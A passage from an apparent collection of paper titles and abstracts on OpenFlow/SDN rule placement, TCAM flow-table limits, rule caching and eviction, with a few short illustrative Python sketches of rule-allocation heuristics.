mode to save energy. SDN can collect traffic matrix and then computes routing solutions satisfying QoS while being minimal in energy consumption. However, prior works on EAR have assumed that the table of OpenFlow switch can hold an infinite number of rules. In practice, this assumption does not hold since the flow table is implemented with Ternary Content Addressable Memory (TCAM) which is expensive and power-hungry. In this paper, we propose an optimization method to minimize energy consumption for a backbone network while respecting capacity constraints on links and rule space constraints on routers. In details, we present an exact formulation using Integer Linear Program (ILP) and introduce efficient greedy heuristic algorithm. Based on simulations, we show that using this smart rule space allocation, it is possible to save almost as much power consumption as the classical EAR approach. --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. 
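A minimal sketch of the wildcard-rule idea introduced in the load-balancing entry above (and continued just below): cover the client address space with a few prefix rules whose sizes approximate the target split across server replicas. The function, the /24 client prefix and the power-of-two weights are simplifying assumptions for illustration, not the paper's rule-computation algorithm.

```python
# Sketch: split a /24 of client source addresses across replicas using prefix
# (wildcard) rules. Assumes uniform traffic over the prefix and weights that
# are powers of two and sum to 1, so each replica gets whole aligned prefixes.

import ipaddress
from math import log2

def wildcard_rules(base, weights):
    """Return (prefix, replica) pairs approximating the target traffic split."""
    base_net = ipaddress.ip_network(base)
    free = [base_net]                          # aligned prefixes not yet assigned
    rules = []
    # Allocate the largest shares first so they receive the shortest prefixes.
    for replica, frac in sorted(weights.items(), key=lambda kv: -kv[1]):
        target_len = base_net.prefixlen + int(round(-log2(frac)))
        block = free.pop()
        while block.prefixlen < target_len:
            first, second = list(block.subnets(prefixlen_diff=1))
            free.append(second)                # keep the sibling for later replicas
            block = first
        rules.append((str(block), replica))
    return rules

# 50% of clients to A, 25% to B, 25% to C
for prefix, replica in wildcard_rules("192.0.2.0/24", {"A": 0.5, "B": 0.25, "C": 0.25}):
    print(f"match ip_src={prefix} -> forward to {replica}")
# match ip_src=192.0.2.0/25   -> forward to A
# match ip_src=192.0.2.128/26 -> forward to B
# match ip_src=192.0.2.192/26 -> forward to C
```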
We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Optimizing the "one big switch" abstraction in software-defined networks paper_content: Software Defined Networks (SDNs) support diverse network policies by offering direct, network-wide control over how switches handle traffic. Unfortunately, many controller platforms force applications to grapple simultaneously with end-to-end connectivity constraints, routing policy, switch memory limits, and the hop-by-hop interactions between forwarding rules. We believe solutions to this complex problem should be factored in to three distinct parts: (1) high-level SDN applications should define their end-point connectivity policy on top of a "one big switch" abstraction; (2) a mid-level SDN infrastructure layer should decide on the hop-by-hop routing policy; and (3) a compiler should synthesize an effective set of forwarding rules that obey the user-defined policies and adhere to the resource constraints of the underlying hardware. In this paper, we define and implement our proposed architecture, present efficient rule-placement algorithms that distribute forwarding policies across general SDN networks while managing rule-space constraints, and show how to support dynamic, incremental update of policies. We evaluate the effectiveness of our algorithms analytically by providing complexity bounds on their running time and rule space, as well as empirically, using both synthetic benchmarks, and real-world firewall and routing policies. --- paper_title: Optimizing rules placement in OpenFlow networks: trading routing for better efficiency paper_content: The idea behind Software Defined Networking (SDN) is to conceive the network as one programmable entity rather than a set of devices to manually configure, and OpenFlow meets this objective. In OpenFlow, a centralized programmable controller installs rules onto switches to implement policies. However, this flexibility comes at the expense of extra overhead as the number of rules might exceed the memory capacity of switches, which raises the question of how to place most profitable rules on board. Solutions proposed so far strictly impose paths to be followed inside the network. We advocate instead that we can trade routing requirements within the network to concentrate on where to forward traffic, not how to do it. As an illustration of the concept, we propose an optimization problem that gets the maximum amount of traffic delivered according to policies and the actual dimensioning of the network. The traffic that cannot be accommodated is forwarded to the controller that has the capacity to process it further. We also demonstrate that our approach permits a better utilization of scarce resources in the network. --- paper_title: MoRule: Optimized rule placement for mobile users in SDN-enabled access networks paper_content: With the surging popularity of smartphones and tablets, mobile network traffic has dramatically increased in recent years. Software defined network (SDN) provides a scalable and flexible structure to simplify network traffic management. It has been shown that rule placement plays an important role in the performance of SDN. 
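The rule placement formulations cited above share a common core: every flow needs a rule somewhere on its path, switch rule capacity is a hard constraint, and traffic that cannot be accommodated is deferred to the controller. The toy greedy heuristic below only illustrates that trade-off; it is not the ILP or the heuristics proposed in the cited papers, and the flow and switch names are made up.

```python
# Toy rule-placement heuristic: each flow needs one rule on some switch of its
# path; switches have a hard rule capacity; flows that cannot be placed are
# handled by the controller. Greedy by traffic volume, least-loaded switch first.

def place_rules(flows, capacity):
    """flows: list of (flow_id, volume, path), path being a list of switch ids.
    capacity: dict switch_id -> maximum number of rules.
    Returns (placement: flow_id -> switch_id, set of unplaced flow ids)."""
    used = {sw: 0 for sw in capacity}
    placement, unplaced = {}, set()
    # Most valuable (highest-volume) flows get rule space first.
    for flow_id, volume, path in sorted(flows, key=lambda f: -f[1]):
        candidates = [sw for sw in path if used[sw] < capacity[sw]]
        if not candidates:
            unplaced.add(flow_id)              # e.g. redirect to the controller
            continue
        chosen = min(candidates, key=lambda sw: used[sw] / capacity[sw])
        used[chosen] += 1
        placement[flow_id] = chosen
    return placement, unplaced

flows = [("f1", 10, ["s1", "s2"]), ("f2", 5, ["s1", "s3"]), ("f3", 1, ["s1"])]
capacity = {"s1": 1, "s2": 1, "s3": 1}
placement, unplaced = place_rules(flows, capacity)
print(placement)   # {'f1': 's1', 'f2': 's3'}
print(unplaced)    # {'f3'}: s1 is full, so the smallest flow goes to the controller
```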
However, since most existing work considers static network topologies of wired networks, it cannot be directly applied for mobile networks. In this paper, we propose MoRule, an efficient rule management scheme to optimize the rule placement for mobile users. To deal with the challenges of user mobility and rule capacity constraints of switches, we design a heuristic algorithm with low-complexity to minimize the rule space occupation while guaranteeing that the mobile traffic processed by local switches is no less than a threshold. By conducting extensive simulations, we demonstrate that our proposed algorithm significantly outperforms random solutions under various network settings. --- paper_title: OFFICER: A general optimization framework for OpenFlow rule allocation and endpoint policy enforcement paper_content: The Software-Defined Networking approach permits to realize new policies. In OpenFlow in particular, a controller decides on behalf of the switches which forwarding rules must be installed and where. However with this flexibility comes the challenge of the computation of a rule allocation matrix meeting both high-level policies and the network constraints such as memory or link capacity limitations. Nevertheless, in many situations (e.g., data-center networks), the exact path followed by packets does not severely impact performances as long as packets are delivered according to the endpoint policy. It is thus possible to deviate part of the traffic to alternative paths so to better use network resources without violating the endpoint policy. In this paper, we propose a linear optimization model of the rule allocation problem in resource constrained OpenFlow networks with relaxing routing policy. We show that the general problem is NP-hard and propose a polynomial time heuristic, called OFFICER, which aims to maximize the amount of carried traffic in under-provisioned networks. Our numerical evaluation on four different topologies shows that exploiting various paths allows to increase the amount of traffic supported by the network without significantly increasing the path length. --- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. 
In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: FlowMaster: Early Eviction of Dead Flow on SDN Switches paper_content: High performance switches employ extremely low latency memory subsystems in an effort to reap the lowest feasible end-to-end flow level latencies. Their capacities are extremely valuable as the size of these memories is limited due to several architectural constraints such as power and silicon area. This necessity is further exacerbated with the emergence of Software Defined Networks SDN where fine-grained flow definitions lead to explosion in the number of flow entries. In this paper, we propose FlowMaster, a speculative mechanism to update the flow table by predicting when an entry becomes stale and evict the same early to accommodate new entries. We collage the observations from predictors into a Markov based learning predictor that predicts whether a flow is valuable any more. Our experiments confirm that FlowMaster enables efficient usage of flow tables thereby reducing the discard rate from flow table by orders of magnitude and in some cases, eliminating discards completely. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we ``splice'' long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). 
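The caching constraint at the heart of the Infinite CacheFlow entry above, namely that a rule may only be cached together with every higher-priority rule whose match overlaps it, can be illustrated with a short sketch. The overlap test and the greedy selection below are simplifications of the paper's dependency-splicing technique; the rule set is invented for the example.

```python
# Sketch of dependency-aware rule caching: a rule may be placed in the fast
# (TCAM-like) cache only together with every higher-priority rule whose match
# overlaps it, otherwise cached traffic would be classified incorrectly.

def overlaps(m1, m2):
    """Two wildcard matches overlap if no shared field pins different values."""
    return all(m1[k] == m2[k] for k in m1.keys() & m2.keys())

def dependencies(rule, rules):
    """Higher-priority rules whose match overlaps this rule's match."""
    return {r["id"] for r in rules
            if r["priority"] > rule["priority"] and overlaps(r["match"], rule["match"])}

def choose_cache(rules, cache_size):
    cached = set()
    # Consider the most-hit rules first.
    for rule in sorted(rules, key=lambda r: -r["hits"]):
        group = {rule["id"]} | dependencies(rule, rules)   # rule plus its ancestors
        if len(cached | group) <= cache_size:
            cached |= group
    return cached

rules = [
    {"id": "r1", "priority": 3, "match": {"dst": "10.0.0.1"}, "hits": 5},
    {"id": "r2", "priority": 2, "match": {},                  "hits": 90},  # catch-all
    {"id": "r3", "priority": 1, "match": {"dst": "10.0.0.2"}, "hits": 40},
]
print(choose_cache(rules, cache_size=2))   # {'r1', 'r2'}: caching r2 drags in r1
```

CacheFlow's actual contribution is to break such dependency chains ("splicing") so that a popular rule does not force all of its ancestors into the cache; the sketch above only shows why the dependency must be respected at all.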
--- paper_title: Scalable rule management for data centers paper_content: Cloud operators increasingly need more and more fine-grained rules to better control individual network flows for various traffic management policies. In this paper, we explore automated rule management in the context of a system called vCRIB (a virtual Cloud Rule Information Base), which provides the abstraction of a centralized rule repository. The challenge in our approach is the design of algorithms that automatically off-load rule processing to overcome resource constraints on hypervisors and/or switches, while minimizing redirection traffic overhead and responding to system dynamics. vCRIB contains novel algorithms for finding feasible rule placements and adapting traffic overhead induced by rule placement in the face of traffic changes and VM migration. We demonstrate that vCRIB can find feasible rule placements with less than 10% traffic overhead even in cases where the traffic-optimal rule placement may be infeasible with respect to hypervisor CPU or memory constraints. --- paper_title: SwitchReduce: Reducing switch state and controller involvement in OpenFlow networks paper_content: OpenFlow is a popular network architecture where a logically centralized controller (the control plane) is physically decoupled from all forwarding switches (the data plane). Through this controller, the OpenFlow framework enables flow level granularity in switches thereby providing monitoring and control over each individual flow. Among other things, this architecture comes at the cost of placing significant stress on switch state size and overburdening the controller in various traffic engineering scenarios such as dynamic re-routing of flows. Storing a flow match rule and flow counter at every switch along a flow's path results in many thousands of entries per switch. Dynamic rerouting of a flow, either in an attempt to utilize less congested paths, or as a consequence of virtual machine migration, results in controller intervention at every switch along the old and new paths. In the absence of careful orchestration of flow storage and controller involvement, OpenFlow will be unable to scale to anticipated production data center sizes. In this context, we present SwitchReduce - a system to reduce switch state and controller involvement in OpenFlow networks. SwitchReduce is founded on the observation that the number of flow match rules at any switch should be no more than the set of unique processing actions it has to take on incoming flows. Additionally, the flow counters for every unique flow may be maintained at only one switch in the network. We have implemented SwitchReduce as a NOX controller application. Simulation results with real data center traffic traces reveal that SwitchReduce can reduce flow entries by up to approximately 49% on first hop switches, and up to 99.9% on interior switches, while reducing flow counters by 75% on average. --- paper_title: vCRIB: virtualized rule management in the cloud paper_content: Cloud operators increasingly need many fine-grained rules to better control individual network flows for various management tasks. While previous approaches have advocated placing rules either on hypervisors or switches, we argue that future data centers would benefit from leveraging rule processing capabilities at both for better scalability and performance. 
In this paper, we propose vCRIB, a virtualized Cloud Rule Information Base that allows operators to freely define different management policies without the need to consider underlying resource constraints. The challenge in our approach is the design of a vCRIB manager that automatically partitions and places rules at both hypervisors and switches to achieve a good trade-off between resource usage and performance. --- paper_title: PAST: scalable ethernet for data centers paper_content: We present PAST, a novel network architecture for data center Ethernet networks that implements a Per-Address Spanning Tree routing algorithm. PAST preserves Ethernet's self-configuration and mobility support while increasing its scalability and usable bandwidth. PAST is explicitly designed to accommodate unmodified commodity hosts and Ethernet switch chips. Surprisingly, we find that PAST can achieve performance comparable to or greater than Equal-Cost Multipath (ECMP) forwarding, which is currently limited to layer-3 IP networks, without any multipath hardware support. In other words, the hardware and firmware changes proposed by emerging standards like TRILL are not required for high-performance, scalable Ethernet networks. We evaluate PAST on Fat Tree, HyperX, and Jellyfish topologies, and show that it is able to capitalize on the advantages each offers. We also describe an OpenFlow-based implementation of PAST in detail. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: Shadow MACs: scalable label-switching for commodity ethernet paper_content: While SDN promises fine-grained, dynamic control of the network, in practice limited switch TCAM rule space restricts most forwarding to be coarse-grained. As an alternative, we demonstrate that using destination MAC addresses as opaque forwarding labels allows an SDN controller to leverage large MAC (L2) forwarding tables to manage a plethora of fine-grained paths. In this shadow MAC model, the SDN controller can install MAC rewrite rules at the network edge to guide traffic on to intelligently selected paths to balance traffic, avoid failed links, or route flows through middleboxes. 
Further, by decoupling the network edge from the core, we address many other problems with SDN, including consistent network updates, fast rerouting, and multipathing with end-to-end control. --- paper_title: Effective switch memory management in OpenFlow networks paper_content: OpenFlow networks require installation of flow rules in a limited capacity switch memory (Ternary Content Addressable Memory or TCAMs, in particular) from a logically centralized controller. A controller can manage the switch memory in an OpenFlow network through events that are generated by the switch at discrete time intervals. Recent studies have shown that data centers can have up to 10,000 network flows per second per server rack today. Increasing the TCAM size to accommodate these large number of flow rules is not a viable solution since TCAM is costly and power hungry. Current OpenFlow controllers handle this issue by installing flow rules with a default idle timeout after which the switch automatically evicts the rule from its TCAM. This results in inefficient usage of switch memory for short lived flows when the timeout is too high and in increased controller workload for frequent flows when the timeout is too low. In this context, we present SmartTime - an OpenFlow controller system that combines an adaptive timeout heuristic to compute efficient idle timeouts with proactive eviction of flow rules, which results in effective utilization of TCAM space while ensuring that TCAM misses (or controller load) does not increase. To the best of our knowledge, SmartTime is the first real implementation of an intelligent flow management strategy in an OpenFlow controller that can be deployed in current OpenFlow networks. In our experiments using multiple real data center packet traces and cache sizes, SmartTime adaptive policy consistently outperformed the best performing static idle timeout policy or random eviction policy by up to 58% in terms of total cost. --- paper_title: A flow entry management scheme for reducing controller overhead paper_content: In this paper, we advocate addressing the communication overhead problem between OpenFlow controllers and OpenFlow switches due to table-miss in a flow table. It may cause the communication overhead between controllers and switches because a switch has to send packet-in message to a controller for processing table-missed flows. We propose a simple flow entry management scheme for reducing the controller overhead by increasing the flow entry matching ratio. By using an LRU caching algorithm, a switch can keep the flow entries in a flow table as many as possible, and then the flow entry matching ratio can be increased. --- paper_title: Network traffic characteristics of data centers in the wild paper_content: Although there is tremendous interest in designing improved networks for data centers, very little is known about the network-level traffic characteristics of data centers today. In this paper, we conduct an empirical study of the network traffic in 10 data centers belonging to three different categories, including university, enterprise campus, and cloud data centers. Our definition of cloud data centers includes not only data centers employed by large online service providers offering Internet-facing applications but also data centers used to host data-intensive (MapReduce style) applications). We collect and analyze SNMP statistics, topology and packet-level traces. 
We examine the range of applications deployed in these data centers and their placement, the flow-level and packet-level transmission properties of these applications, and their impact on network and link utilizations, congestion and packet drops. We describe the implications of the observed traffic patterns for data center internal traffic engineering as well as for recently proposed architectures for data center networks. --- paper_title: An adaptive scheme for data forwarding in software defined network paper_content: Software Defined Network (SDN) is gaining increasing popularity among networking deployment schemes. The main advantage of SDN lies in its flexibility in controlling network traffic, which arises from decoupling the control plane and the data plane of network devices. However, despite the valuable merits of SDN, the risk of data-forwarding outages should not be ignored. The drawback mainly results from the length limitation of switch flow tables, the congestion between controllers and switches, and the deficiency of the controller capacity, which are all closely related to the timeout mechanism of the flow table. In our study, these deficiencies of the SDN system are analyzed explicitly. Moreover, we propose an adaptive control mechanism aimed at optimizing the idle-timeout setting of flow tables and the cooperation between controllers and switches. Our mechanism achieves a higher flow-table matching ratio and alleviates congestion in the control channel, enabling smoother data forwarding in SDN. --- paper_title: FlowMaster: Early Eviction of Dead Flow on SDN Switches paper_content: High-performance switches employ extremely low-latency memory subsystems in an effort to reap the lowest feasible end-to-end flow-level latencies. Their capacities are extremely valuable as the size of these memories is limited due to several architectural constraints such as power and silicon area. This necessity is further exacerbated with the emergence of Software Defined Networks (SDN), where fine-grained flow definitions lead to an explosion in the number of flow entries. In this paper, we propose FlowMaster, a speculative mechanism to update the flow table by predicting when an entry becomes stale and evicting it early to accommodate new entries. We collate the observations from predictors into a Markov-based learning predictor that predicts whether a flow is still valuable. Our experiments confirm that FlowMaster enables efficient usage of flow tables, reducing the discard rate from the flow table by orders of magnitude and, in some cases, eliminating discards completely. --- paper_title: An efficient flow cache algorithm with improved fairness in Software-Defined Data Center Networks paper_content: The use of Software-Defined Networking (SDN) with OpenFlow-enabled switches in data centers has received much attention from researchers and industry. One of the major issues in an OpenFlow switch is the limited size of the flow table, which results in evictions of flows from the table. From data center traffic characteristics, we observe that elephant flows are very large in size (data volume) but few in number compared to mice flows. Thus, elephant flows are more likely to be evicted due to the limited size of the switch flow table, causing additional traffic to the controller. We propose a differential flow cache framework that achieves fairness and efficient cache maintenance with fast lookup and a reduced cache miss ratio.
The framework uses a hash-based placement and localized Least Recently Used (LRU)-based replacement mechanisms. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: DevoFlow: scaling flow management for high-performance networks paper_content: OpenFlow is a great concept, but its original design imposes excessive overheads. It can simplify network and traffic management in enterprise and data center environments, because it enables flow-level control over Ethernet switching and provides global visibility of the flows in the network. However, such fine-grained control and visibility comes with costs: the switch-implementation costs of involving the switch's control-plane too often and the distributed-system costs of involving the OpenFlow controller too frequently, both on flow setups and especially for statistics-gathering. ::: In this paper, we analyze these overheads, and show that OpenFlow's current design cannot meet the needs of high-performance networks. We design and evaluate DevoFlow, a modification of the OpenFlow model which gently breaks the coupling between control and global visibility, in a way that maintains a useful amount of visibility without imposing unnecessary costs. We evaluate DevoFlow through simulations, and find that it can load-balance data center traffic as well as fine-grained solutions, without as much overhead: DevoFlow uses 10--53 times fewer flow table entries at an average switch, and uses 10--42 times fewer control messages. --- paper_title: NOX: towards an operating system for networks paper_content: As anyone who has operated a large network can attest, enterprise networks are difficult to manage. That they have remained so despite significant commercial and academic efforts suggests the need for a different network management paradigm. Here we turn to operating systems as an instructive example in taming management complexity. 
In the early days of computing, programs were written in machine languages that had no common abstractions for the underlying physical resources. This made programs hard to write, port, reason about, and debug. Modern operating systems facilitate program development by providing controlled access to high-level abstractions for resources (e.g., memory, storage, communication) and information (e.g., files, directories). These abstractions enable programs to carry out complicated tasks safely and efficiently on a wide variety of computing hardware. In contrast, networks are managed through low-level configuration of individual components. Moreover, these configurations often depend on the underlying network; for example, blocking a user’s access with an ACL entry requires knowing the user’s current IP address. More complicated tasks require more extensive network knowledge; forcing guest users’ port 80 traffic to traverse an HTTP proxy requires knowing the current network topology and the location of each guest. In this way, an enterprise network resembles a computer without an operating system, with network-dependent component configuration playing the role of hardware-dependent machine-language programming. What we clearly need is an “operating system” for networks, one that provides a uniform and centralized programmatic interface to the entire network. Analogous to the read and write access to various resources provided by computer operating systems, a network operating system provides the ability to observe and control a network. A network operating system does not manage the network itself; it merely provides a programmatic interface. Applications implemented on top of the network operating system perform the actual management tasks. The programmatic interface should be general enough to support a broad spectrum of network management applications. Such a network operating system represents two major conceptual departures from the status quo. First, the network operating system presents programs with a centralized programming model; programs are written as if the entire network were present on a single machine (i.e., one would use Dijkstra to compute shortest paths, not Bellman-Ford). This requires (as in [3, 8, 14] and elsewhere) centralizing network state. Second, programs are written in terms of high-level abstractions (e.g., user and host names), not low-level configuration parameters (e.g., IP and MAC addresses). This allows management directives to be enforced independent of the underlying network topology, but it requires that the network operating system carefully maintain the bindings (i.e., mappings) between these abstractions and the low-level configurations. Thus, a network operating system allows management applications to be written as centralized programs over highlevel names as opposed to the distributed algorithms over low-level addresses we are forced to use today. While clearly a desirable goal, achieving this transformation from distributed algorithms to centralized programming presents significant technical challenges, and the question we pose here is: Can one build a network operating system at significant scale? --- paper_title: Constructing optimal IP routing tables paper_content: The Border Gateway Protocol (BGP) populates Internet backbone routers with routes or prefixes. We present an algorithm to locally compute (without any modification to BGP) equivalent forwarding tables that provably contain the minimal number of prefixes. 
For large backbone routers, the Optimal Routing Table Constructor (ORTC) algorithm that we present produces routing tables with roughly 60% of the original number of prefixes. The publicly available MaeEast database with 41315 prefixes reduces to 23007 prefixes when ORTC is applied. We present performance measurements on four publicly available databases and a formal proof that ORTC does produce the optimal set of routes. --- paper_title: Source flow: handling millions of flows on flow-based nodes paper_content: Flow-based networks such as OpenFlow-based networks have difficulty handling a large number of flows in a node due to the capacity limitation of search engine devices such as ternary content-addressable memory (TCAM). One typical solution of this problem would be to use MPLS-like tunneling, but this approach spoils the advantage of flow-by-flow path selection for load-balancing or QoS. We demonstrate a method named "Source Flow" that allows us to handle a huge amount of flows without changing the granularity of flows. By using our method, expensive and power consuming search engine devices can be removed from the core nodes, and the network can grow pretty scalable. In our demo, we construct a small network that consists of small number of OpenFlow switches, a single OpenFlow controller, and end-hosts. The hosts generate more than one million flows simultaneously and the flows are controlled on a per-flow-basis. All active flows are monitored and visualized on a user interface and the user interface allows audiences to confirm if our method is feasible and deployable. --- paper_title: The joint optimization of rules allocation and traffic engineering in Software Defined Network paper_content: Software-Defined Network (SDN) is a promising network paradigm that separates the control plane and data plane in the network. It has shown great advantages in simplifying network management such that new functions can be easily supported without physical access to the network switches. However, Ternary Content Addressable Memory (TCAM), as a critical hardware storing rules for high-speed packet processing in SDN-enabled devices, can be supplied to each device with very limited quantity because it is expensive and energy-consuming. To efficiently use TCAM resources, we propose a rule multiplexing scheme, in which the same set of rules deployed on each node apply to the whole flow of a session going through but towards different paths. Based on this scheme, we study the rule placement problem with the objective of minimizing rule space occupation for multiple unicast sessions under QoS constraints.We formulate the optimization problem jointly considering routing engineering and rule placement under both existing and our rule multiplexing schemes. Finally, extensive simulations are conducted to show that our proposals significantly outperform existing solutions. --- paper_title: Bit Weaving: A Non-Prefix Approach to Compressing Packet Classifiers in TCAMs paper_content: Ternary content addressable memories (TCAMs) have become the de facto standard in industry for fast packet classification. Unfortunately, TCAMs have limitations of small capacity, high power consumption, high heat generation, and high cost. The well-known range expansion problem exacerbates these limitations as each classifier rule typically has to be converted to multiple TCAM rules. One method for coping with these limitations is to use compression schemes to reduce the number of TCAM rules required to represent a classifier. 
Unfortunately, all existing compression schemes only produce prefix classifiers. Thus, they all miss the compression opportunities created by non-prefix ternary classifiers. In this paper, we propose bit weaving, the first non-prefix compression scheme. Bit weaving is based on the observation that TCAM entries that have the same decision and whose predicates differ by only one bit can be merged into one entry by replacing the bit in question with a "don't care" bit (*). Bit weaving consists of two new techniques, bit swapping and bit merging, to first identify and then merge such rules together. The key advantages of bit weaving are that it runs fast, it is effective, and it is composable with other TCAM optimization methods as a pre/post-processing routine. We implemented bit weaving and conducted experiments on both real-world and synthetic packet classifiers. Our experimental results show the following: 1) bit weaving is an effective standalone compression technique (it achieves an average compression ratio of 23.6%); 2) bit weaving finds compression opportunities that other methods miss. Specifically, bit weaving improves the prior TCAM optimization techniques of TCAM Razor and Topological Transformation by an average of 12.8% and 36.5%, respectively. --- paper_title: Infinite CacheFlow in software-defined networks paper_content: Software-Defined Networking (SDN) enables fine-grained policies for firewalls, load balancers, routers, traffic monitoring, and other functionality. While Ternary Content Addressable Memory (TCAM) enables OpenFlow switches to process packets at high speed based on multiple header fields, today's commodity switches support just thousands to tens of thousands of rules. To realize the potential of SDN on this hardware, we need efficient ways to support the abstraction of a switch with arbitrarily large rule tables. To do so, we define a hardware-software hybrid switch design that relies on rule caching to provide large rule tables at low cost. Unlike traditional caching solutions, we neither cache individual rules (to respect rule dependencies) nor compress rules (to preserve the per-rule traffic counts). Instead we "splice" long dependency chains to cache smaller groups of rules while preserving the semantics of the network policy. Our design satisfies four core criteria: (1) elasticity (combining the best of hardware and software switches), (2) transparency (faithfully supporting native OpenFlow semantics, including traffic counters), (3) fine-grained rule caching (placing popular rules in the TCAM, despite dependencies on less-popular rules), and (4) adaptability (to enable incremental changes to the rule caching as the policy changes). --- paper_title: Compressing rectilinear pictures and minimizing access control lists paper_content: We consider a geometric model for the problem of minimizing access control lists (ACLs) in network routers, a model that also has applications to rectilinear picture compression and figure drawing in common graphics software packages. Here the goal is to create a colored rectilinear pattern within an initially white rectangular canvas, and the basic operation is to choose a subrectangle and paint it a single color, overwriting all previous colors in the rectangle. Rectangle Rule List (RRL) minimization is the problem of finding the shortest list of rules needed to create a given pattern. ACL minimization is a restricted version of this problem where the set of allowed rectangles must correspond to pairs of IP address prefixes.
Motivated by the ACL application, we study the special cases of RRL and ACL minimization in which all rectangles must be strips that extend either the full width or the full height of the canvas (strip-rules). We provide several equivalent characterizations of the patterns achievable using strip-rules and present polynomial-time algorithms for optimally constructing such patterns when, as in the ACL application, the only colors are black and white (permit or deny). We also show that RRL minimization is NP-hard in general and provide O(min(n1/3, OPT1/2))-approximation algorithms for general RRL and ACL minimization by exploiting our results about strip-rule patterns. --- paper_title: Rule Optimization for Real-Time Query Service in Software-Defined Internet of Vehicles paper_content: Internet of Vehicles (IoV) has recently gained considerable attentions from both industry and research communities since the development of communication technology and smart city. However, a proprietary and closed way of operating hardwares in network equipments slows down the progress of new services deployment and extension in IoV. Moreover, the tightly coupled control and data planes in traditional networks significantly increase the complexity and cost of network management. By proposing a novel architecture, called Software-Defined Internet of Vehicles (SDIV), we adopt the software-defined network (SDN) architecture to address these problems by leveraging its separation of the control plane from the data plane and a uniform way to configure heterogeneous switches. However, the characteristics of IoV introduce the very challenges in rule installation due to the limited size of Flow Tables at OpenFlow-enabled switches which are the main component of SDN. It is necessary to build compact Flow Tables for the scalability of IoV. Accordingly, we develop a rule optimization approach for real-time query service in SDIV. Specifically, we separate wired data plane from wireless data plane and use multicast address in wireless data plane. Furthermore, we introduce a destination-driven model in wired data plane for reducing the number of rules at switches. Experiments show that our rule optimization strategy reduces the number of rules while keeping the performance of data transmission. --- paper_title: Palette: Distributing tables in software-defined networks paper_content: In software-defined networks (SDNs), the network controller first formulates abstract network-wide policies, and then implements them in the forwarding 